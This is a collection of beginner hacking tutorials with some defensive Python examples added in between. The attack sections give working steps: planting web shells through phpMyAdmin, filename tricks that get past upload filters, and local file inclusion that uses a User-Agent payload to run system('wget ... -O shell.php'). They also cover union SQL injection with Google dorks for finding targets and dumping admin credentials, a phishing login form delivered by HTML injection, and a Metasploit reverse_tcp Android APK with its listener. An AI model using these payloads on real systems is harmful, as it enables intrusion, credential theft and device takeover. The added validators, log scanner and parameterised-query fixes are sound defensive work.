Shell Uploading Via Phpmyadmin


In this tutorial I will show you shell uploading via phpMyAdmin step by step. To those who already know this trick, I am sorry, but many of my friends don't know it.

phpMyAdmin should be protected with a password, but there are still some websites that don't use a password on phpMyAdmin.

  • First we must know the path of the document root, for example from phpinfo.php.
  • Now we will go to phpMyAdmin and create a database.

I have created a database named shell. Just create a database with your desired name.

  • After creating the database, click on it, go to Structure and create a table with 1 column. After clicking Go, enter a name and set the type to TEXT.

  • Then go to Insert, paste your uploader code and click Go.

  • Now go to the table in the database, open the SQL tab and insert this query.

SELECT * FROM shell INTO OUTFILE 'C://wamp//www//shell//shell.php'

  • We have now uploaded our uploader from phpMyAdmin. Just go to the desired location and upload your shell. 😉

Shell Uploading Via Tamper Data


In this session we will discuss shell uploading via Tamper Data, an upload bypass method. Suppose that during hacking you have logged in to an admin panel that asks you to upload images with .jpg and .png extensions, so you are not able to upload a shell. Then read this tutorial carefully, step by step.

In this tutorial we will bypass the file upload restriction using the .jpg extension, so let's start our work.

  • Go to the location of your files and rename your shell with a .php.jpg extension, for example shell.php to shell.php.jpg.
  • Now click Tools > Tamper Data > Start Tamper and click on upload.
  • Now tamper the request: in the POST data find your file, rename shell.php.jpg to shell.php and then click OK.
  • Your shell is now uploaded; just access it.

Advanced Shell Uploading: Bypassing Extension Checks

1) shell.jpg.php (satisfies a check for jpg only)
2) shell.jpg.PhP (obfuscation)
3) shell.php;.jpg (sometimes what's after “;” is ignored)
4) shell.php%0delete0.jpg (the infamous NULL byte which comments out trailing text, remove the word delete so the zeros join together, blogspot strips this string!)
5) shell.php.test (defaults to first recognised extension ignoring “test”)
6) shell.php.xxxjpg (still ends in .jpg, but not recognised extension so will default to php!)
7) .phtml (a commonly used php parsed extension often forgotten about!)
8) .php3/.php4/.php5 (valid PHP extensions possibly left out of extension blacklists)
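
A defender's view of the list above, as an added example that is not part of the original post: a server-side upload check that rejects every name in the list. It is written in Python for illustration; the function names, the JPEG/PNG allowlist and the sample header bytes are assumptions.

```python
import os
import re
import secrets

# Assumption: the application only needs JPEG and PNG uploads.
MAGIC = {"jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff",
         "png": b"\x89PNG\r\n\x1a\n"}
SAFE_STEM = re.compile(r"[A-Za-z0-9_-]{1,64}")

# Constructed sample input: the file names from the list above.
LISTED_NAMES = [
    "shell.jpg.php", "shell.jpg.PhP", "shell.php;.jpg", "shell.php\x00.jpg",
    "shell.php.test", "shell.php.xxxjpg", "shell.phtml", "shell.php5",
]


def stored_name(client_name, head):
    """Return a server-chosen file name, or raise ValueError.

    client_name is the name as the server received it; head is the first
    bytes of the uploaded content.
    """
    base = os.path.basename(client_name.replace("\\", "/"))
    stem, dot, ext = base.rpartition(".")
    # One extension only, and a stem without dots, ';', '%' or NUL bytes.
    if not dot or not SAFE_STEM.fullmatch(stem):
        raise ValueError("unexpected file name: %r" % client_name)
    ext = ext.lower()
    if ext not in MAGIC:                      # allowlist, not a blacklist
        raise ValueError("extension not allowed: %r" % ext)
    if not head.startswith(MAGIC[ext]):       # content must match the type
        raise ValueError("content does not match ." + ext)
    # The client's name never reaches the disk.
    return secrets.token_hex(16) + "." + ext


def accepted(client_name, head):
    """True if stored_name() would accept this upload."""
    try:
        stored_name(client_name, head)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    jpeg_head = b"\xff\xd8\xff\xe0" + b"\x00" * 12   # constructed JPEG header
    for name in LISTED_NAMES + ["shell.php.jpg", "holiday.jpg"]:
        print(repr(name), accepted(name, jpeg_head))
```

Storing uploads outside the web root, or in a directory where the web server does not execute scripts, keeps a file that slips past the check from running.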

Local File Inclusion (LFI) Vulnerability Attack


In this tutorial we will discuss the local file inclusion vulnerability, how it occurs and how it can be patched. First, let me start with an introduction to file inclusion.

A file inclusion is a vulnerability which allows an attacker to access unauthorised files on the web server and to execute malicious code by abusing the ‘include’ function.

What is a Local File Inclusion (LFI) vulnerability?

Local file inclusion (LFI) is the inclusion of a local file that is available on the web server. The vulnerability occurs when user input contains the path of the file to be included. When this input is not properly sanitised, an attacker can supply the locations of some default files and access those sensitive files.
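
How the patch mentioned above can look, as an added example that is not from the original post: the page parameter is treated as a key in an allowlist, with a canonicalise-and-contain check as a fallback. Python is used for illustration; PAGES_DIR, PAGE_MAP and the function names are hypothetical, and vulnerable_target assumes the script's working directory is PAGES_DIR.

```python
import os
from pathlib import Path

# Assumptions for this sketch: pages live in one directory, and the
# application knows in advance which pages exist.
PAGES_DIR = Path("/var/www/site/pages")
PAGE_MAP = {"contact": "contact.php", "about": "about.php"}


def vulnerable_target(page):
    """The path an unchecked include of the parameter resolves to."""
    return os.path.normpath(os.path.join(str(PAGES_DIR), page))


def resolve_by_allowlist(page):
    """Preferred fix: the parameter is a key, never a path."""
    filename = PAGE_MAP.get(page)
    return PAGES_DIR / filename if filename else None


def resolve_by_containment(page):
    """Fallback fix: canonicalise, then require the result under PAGES_DIR.

    Comparing path components (not string prefixes) also rejects a sibling
    directory such as /var/www/site/pages-backup.
    """
    if "\x00" in page:
        return None
    base = PAGES_DIR.resolve()
    candidate = (base / page).resolve()
    if base not in candidate.parents:
        return None
    return candidate


if __name__ == "__main__":
    for page in ("contact.php", "../../../etc/passwd",
                 "../../../../../etc/passwd"):
        print(page, "->", vulnerable_target(page),
              "| contained:", resolve_by_containment(page))
```

A request that either function answers with None should get a 404, not an include.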

Finding a Local File Inclusion (LFI) vulnerability in a website

Now we are going to look for a local file inclusion on a website. We found a website, so let's check whether it is vulnerable or not.

 www.vulnerablewebsite.com/view.php?page=contact.php

Now let's replace contact.php with ../ so the URL becomes

www.vulnerablewebsite.com/view.php?page=../

After requesting this page we got an error, so there is a big chance of a Local File Inclusion vulnerability. Let's go to the next step.

Warning: include(../) [function.include]: failed to open stream: No
such file or directory in /home/sirgod/public_html/website.com/view.php on
line 1337

Now let's check for etc/passwd to see whether the site is vulnerable to Local File Inclusion. Let's make a request.

www.vulnerablewebsite.com/view.php?page=../../../etc/passwd

We got an error and no etc/passwd file.

Warning: include(../) [function.include]: failed to open stream: No
such file or directory in /home/sirgod/public_html/website.com/view.php on
line 1337

So we go more directories up.

www.vulnerablewebsite.com/view.php?page=../../../../../etc/passwd

If you get a page like this, you have successfully included the /etc/passwd file.

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
test:x:13:30:test:/var/test:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin

We successfully included a file, and our next step is to include the proc/self/environ file. So now replace /etc/passwd with /proc/self/environ as shown below.

 www.vulnerablewebsite.com/view.php?page=../../../../../proc/self/environ

If you get something like this, you have successfully included the proc/self/environ file.

DOCUMENT_ROOT=/home/sirgod/public_html
GATEWAY_INTERFACE=CGI/1.1
HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac
HTTP_HOST=www.vulnerablewebsite.com
HTTP_REFERER=http://www.vulnerablewebsite.com/index.php?view=../../../../../../etc/passwd
HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00
PATH=/bin:/usr/bin
QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
REDIRECT_STATUS=200
REMOTE_ADDR=6x.1xx.4x.1xx
REMOTE_PORT=35665
REQUEST_METHOD=GET
REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron
SCRIPT_FILENAME=/home/sirgod/public_html/index.php
SCRIPT_NAME=/index.php
SERVER_ADDR=1xx.1xx.1xx.6x
SERVER_ADMIN=webmaster@website.com
SERVER_NAME=www.website.com
SERVER_PORT=80
SERVER_PROTOCOL=HTTP/1.0
SERVER_SIGNATURE=
Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.vulnerablewebsite.com Port 80

proc/self/environ is accessible. If you got a blank page or an error, proc/self/environ is not accessible or the OS is FreeBSD.

Injecting malicious code into a Local File Inclusion vulnerable website

Now let's inject our malicious code into proc/self/environ. How can we do that? We can inject our code in the User-Agent HTTP header. Use the Tamper Data add-on for Firefox to change the User-Agent. Start Tamper Data in Firefox and re-request the URL

 www.vulnerablewebsite.com/view.php?page=../../../../../proc/self/environ

Now tamper this request, add your uploader script in the User-Agent and then submit. After submitting you will get an uploader or the /proc/self/environ page; just browse and upload your shell.

You can also upload your shell by downloading it remotely using the wget command.

 <?system('wget www.shell.com/shell.txt -O shell.php');?>

Add this command in the User-Agent and request the page. Our command is now executed through system(): it downloads the .txt shell from www.shell.com/shell.txt and saves it as shell.php in the website directory, and our shell is created. If it doesn't work, try exec(), because system() can be disabled on the web server in php.ini.

Accessing our shell

Now let's check whether our malicious code was successfully injected. Let's check whether the shell is present.

www.vulnerablewebsite.com/shell.php

Our shell is there. The injection was successful.

So I think everybody enjoyed this tutorial. Keep practising and learning. 🙂
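
From the defender's side, the requests in this walkthrough are easy to spot in a web server access log. The following added example (not part of the original post) flags them in Combined Log Format lines; the sample lines, IP addresses and function names are constructed.

```python
import re
from urllib.parse import unquote

# Combined Log Format: ip - user [time] "request" status bytes "referer" "ua"
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]*\] "(?P<method>[A-Z]+) (?P<target>\S+)'
    r'[^"]*" (?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Constructed sample lines (documentation IP ranges, the tutorial's URLs).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /view.php?page=contact.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /view.php?page=../../../../../etc/passwd HTTP/1.1" 200 1873 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jan/2024:10:02:00 +0000] "GET /view.php?page=..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron HTTP/1.1" 200 2210 "-" "<?system(\'wget www.shell.com/shell.txt -O shell.php\');?>"',
]
SENSITIVE = ("/etc/passwd", "/proc/self/environ")


def findings(line):
    """Return the list of LFI indicators present in one log line."""
    m = LINE_RE.match(line)
    if not m:
        return ["unparsed line"]
    target = unquote(unquote(m["target"]))   # undo single and double encoding
    hits = []
    if "../" in target or "..\\" in target:
        hits.append("path traversal in request")
    if any(s in target for s in SENSITIVE):
        hits.append("sensitive file requested")
    if "<?" in m["ua"]:
        hits.append("PHP code in User-Agent")
    if hits and m["status"] == "200":
        hits.append("server answered 200")
    return hits


def scan(lines):
    """Map client IP -> sorted list of indicators seen from it."""
    report = {}
    for line in lines:
        hits = findings(line)
        if hits:
            ip = line.split(" ", 1)[0]
            report.setdefault(ip, set()).update(hits)
    return {ip: sorted(h) for ip, h in report.items()}


if __name__ == "__main__":
    for ip, hits in scan(SAMPLE_LOG).items():
        print(ip, hits)
```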

SQL injection Union Based Manually Step by Step


Hello guys, hope you are doing well. In this tutorial we will discuss basic union-based SQL injection done manually. First I would recommend that you learn the basics of SQL from w3schools. Let me start with an introduction.

What is SQL Injection?

SQL injection is a type of code injection vulnerability in the database layer. A successful SQL injection exploit can read and modify the backend database. This vulnerability arises when user input is incorrectly filtered before it is placed in a query string.

What can an attacker do?

  • An attacker can inject into the website and read and modify the database.
  • An attacker can take control of your admin panel, if you have one.
  • If the targeted website is an e-commerce site that stores information, the attacker can easily get it.
  • An attacker can upload a shell and deface the website.

So let's start our work…

Step 1:

Find an SQL injection vulnerable website with Google dorks.

inurl:index.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:shop.php?id=

Step 2:

Now check for the vulnerability by adding a single quote after the id parameter and hitting Enter. If you get an error message such as an SQL syntax error, the site is vulnerable to SQL injection.

www.vulnerablesite.com/index.php?id=1'

Step 3:

If the site is vulnerable, you then have to find the number of columns by using the order by statement.

www.vulnerablesite.com/index.php?id=1' order by 1 --+ [no error]
www.vulnerablesite.com/index.php?id=1' order by 2 --+ [no error]
www.vulnerablesite.com/index.php?id=1' order by 3 --+ [no error]
www.vulnerablesite.com/index.php?id=1' order by 4 --+ [no error]
www.vulnerablesite.com/index.php?id=1' order by 5 --+ [error]

Here I got the error message at order by 5, which means the total number of columns is 5.

Step 4:

Now we will find the vulnerable column using the union command.

www.vulnerablesite.com/index.php?id=1' union select 1,2,3,4 -- +

Here the vulnerable column is 2. We can use the following functions in it.

Version - @@version also version()
Database- database()
Current User - user()

Step 5:

Now we will find the table names. Just paste the query given below into the vulnerable column.

(SELECT+GROUP_CONCAT(table_name+SEPARATOR+0x3c62723e)+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_SCHEMA=DATABASE())

Step 6:

Now we will find the column names of a particular table. Just use this query.

www.vulnerablesite.com/index.php?id=1' union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name= [table name in hex]

Now we have the column names of the table, and our next target is to dump the data.

Step 7:

Now we have the database, table name and column names, so we will dump the database of the targeted website. Just replace column_name with the target columns, for example admin, user etc., and add the targeted table in the final FROM.

www.vulnerablesite.com/index.php?id=1' union select 1,group_concat(username,0x3a,password),3,4 from admin--+

Yeah, we got the username and password.

Keep practising, but don't harm any site…
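
The fix for everything in steps 2 to 7 is to bind the id as a parameter. This added example (not from the original post) runs the same inputs against a concatenated and a bound query; it uses Python with an in-memory SQLite database in place of MySQL, and the tables, data and function names are constructed.

```python
import sqlite3


def make_db():
    """Constructed data: one article and one admin row."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE articles (id INTEGER, title TEXT, body TEXT, author TEXT);
        CREATE TABLE admin (username TEXT, password TEXT);
        INSERT INTO articles VALUES (1, 'Welcome', 'First post', 'editor');
        INSERT INTO admin VALUES ('admin', 'constructed-hash');
    """)
    return db


# The step 2 and step 7 inputs; step 7 is rewritten in SQLite syntax.
QUOTE_PROBE = "1'"
UNION_INPUT = ("1' union select 1, username || ':' || password, 3, 4 "
               "from admin-- ")


def article_concatenated(db, raw_id):
    """Vulnerable: raw_id becomes part of the SQL text."""
    sql = ("SELECT id, title, body, author FROM articles "
           "WHERE id = '" + raw_id + "'")
    return db.execute(sql).fetchall()


def article_bound(db, raw_id):
    """Fixed: raw_id is bound as a value and cannot change the statement."""
    sql = "SELECT id, title, body, author FROM articles WHERE id = ?"
    return db.execute(sql, (raw_id,)).fetchall()


def outcome(query, db, raw_id):
    """Return the rows, or 'syntax error' if the database rejects the SQL."""
    try:
        return query(db, raw_id)
    except sqlite3.OperationalError:
        return "syntax error"


if __name__ == "__main__":
    db = make_db()
    for raw_id in ("1", QUOTE_PROBE, UNION_INPUT):
        print(repr(raw_id))
        print("  concatenated:", outcome(article_concatenated, db, raw_id))
        print("  bound:       ", outcome(article_bound, db, raw_id))
```

With the bound query the quote probe no longer produces a syntax error and the union input matches no row, so neither the error message nor the data reaches the page.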

 

How To Access Your LocalHost Any Where


You have spent many hours on your system setting up a CMS. Your CMS is perfectly set up with a nice look and sample posts, and you want to test it on other mobile devices and tablets. Your client also wants to try it out, but you don't have time to migrate to a public server. To give them a quick demo, you can show it from your localhost itself: without using web hosting, you can access your localhost anywhere.

How is it possible to access your localhost anywhere?

It is possible through secure tunnelling services such as

  1. Ngrok
  2. PageKite
  3. Forward
  4. ProxyLocal
  5. Browser Stack

These are the services which provide a secure tunnel from the internet to your PC. They provide a publicly accessible URL and forward it to your localhost system.

So let's start our main work.

Here I am using ngrok; you can download ngrok from their official website.

  • First extract ngrok on your desktop.
  • Press Win+R, type cmd and hit Enter.
  • Go to the desktop using the cd command.
  • Now we will forward port 80, but first start your WAMP/XAMPP. Use the command ngrok http 80 to forward. When you enter this command it will show a new screen in your command prompt.

Now we have a secured tunnel. Just open your forwarding URL and you can access your localhost anywhere.

HTML Injection Step by Step For Beginners

Hello guys, hope you are doing well and practising. Today in this post we will discuss HTML injection and why HTML injection is risky.

What is HTML injection?

HTML injection (Hyper Text Markup Language injection) is a vulnerability which allows an attacker to inject a malicious script via a specific parameter. HTML injection is also referred to as virtual defacement of a web application.

The possible attack scenarios are described below:

  1. An attacker finds a vulnerability and performs HTML injection.
  2. The attacker does phishing from the vulnerable website and sends an email to the victim.
  3. The user visits the page because of the trustworthy domain and enters a user ID and password, which are sent to the attacker's server.

So lets start ..

  1. First you need to find a website which is vulnerable to HTML injection. Here I am using the bWAPP lab.
  2. Here I have opened the page which is vulnerable to HTML injection. Just add your HTML code.
  3. As you can see, I added my simple <h1> ahmed </h1> code and it was executed.
  4. Now let's try some more HTML tags such as bold, colour, background etc.

I have modified the page's look using some basic tags. You can also perform an XSS attack using HTML injection.

So let's try to create a login form using this code.

<form action="http://127.0.0.1/login.php" method="POST">
Username: <input type="text" name="username"><br>
Password: <input type="password" name="pass"><br>
<input type="submit" value="Login"></form>

You can use any page of your own, or your deface page: change this part of the code to your location.

<form action="http://127.0.0.1/login.php" method="POST">

Just log in with any username and password and see what happens.

This page is shown after the victim logs in 🙁 and we successfully got the ID and password.

Keep learning and injecting, but don't harm any site.
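
The fix is to encode request data before writing it into the page. This added example (not from the original post) renders the two payloads above with and without encoding and lists the elements a parser then finds; the page template, the firstname parameter and the function names are hypothetical.

```python
import html
from html.parser import HTMLParser

# Constructed inputs: the two payloads from the walkthrough.
HEADING = "<h1> ahmed </h1>"
LOGIN_FORM = (
    '<form action="http://127.0.0.1/login.php" method="POST">'
    'Username: <input type="text" name="username"><br>'
    'Password: <input type="password" name="pass"><br>'
    '<input type="submit" value="Login"></form>'
)


def page_unescaped(firstname):
    """Vulnerable: request data is pasted into the markup."""
    return "<p>Welcome " + firstname + "</p>"


def page_escaped(firstname):
    """Fixed: request data is encoded for the HTML body context."""
    return "<p>Welcome " + html.escape(firstname, quote=True) + "</p>"


class _Elements(HTMLParser):
    """Collects the name of every start tag the parser sees."""

    def __init__(self):
        super().__init__()
        self.names = []

    def handle_starttag(self, tag, attrs):
        self.names.append(tag)


def elements(markup):
    """Element names a parser finds in the markup, in document order."""
    parser = _Elements()
    parser.feed(markup)
    parser.close()
    return parser.names


if __name__ == "__main__":
    for payload in (HEADING, LOGIN_FORM):
        print("unescaped:", elements(page_unescaped(payload)))
        print("escaped:  ", elements(page_escaped(payload)))
```

A Content-Security-Policy header with form-action 'self' additionally stops a form that does get injected from posting to another origin.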

Hack Android Mobile With Metasploit step by step


Hello guys, today in this post we will discuss how to hack an Android mobile. There are many ways of Android hacking, but today I will show you how you can hack an Android mobile using Metasploit, because Metasploit is a freeware framework. First let me start with an introduction.

Android

Android is a mobile operating system based on the Linux kernel, developed by Google. Android is designed primarily for touch-screen mobile devices such as smartphones and tablets, with a user interface based on direct manipulation.

So let's come to the point.

Prerequisites:

  1. Android Phone
  2. Attacker system Kali linux
  3. Metasploit
  4. Brain 🙂

These are the requirements to perform this practical. In this Metasploit series I am covering the basics and will go up to post exploitation.

  • As an attacker we need to check our IP address using the “ifconfig” command to set LHOST & LPORT.
  • Now you need to create a payload with msfpayload; use the following command.

msfpayload android/meterpreter/reverse_tcp LHOST=[Attacker IP address] LPORT [Port which you want to forward] R > /var/www/anyname.apk

Here I set LPORT to 443 for one good reason: almost every mobile has 443 open.

Using the above command, the apk will be created.

  • Now launch msfconsole.
  • Here we use the exploit multi handler to start our attack as well as the payload.
  • Use the commands given below.

use exploit/multi/handler [Enter]
set payload/android/meterpreter/reverse_tcp [Enter]
Set LHOST= attacker Ip
set LPORT=443

Now we need to give permission to the apk that we created, attack.apk. To give permission, use this command

chmod 777 /var/www/attack.apk

Yeah, we gave permission to our apk. Now I will send the file to the victim. Before the victim installs the file, start your Metasploit listener using the exploit command. When the victim has installed your apk, Metasploit's output changes and shows you that a session has opened.

Now our listener is listening to traffic and giving information.

In a previous tutorial we discussed post exploitation with meterpreter on the netapi Windows XP vulnerability; read it carefully, the steps are the same.

Keep learning and practising…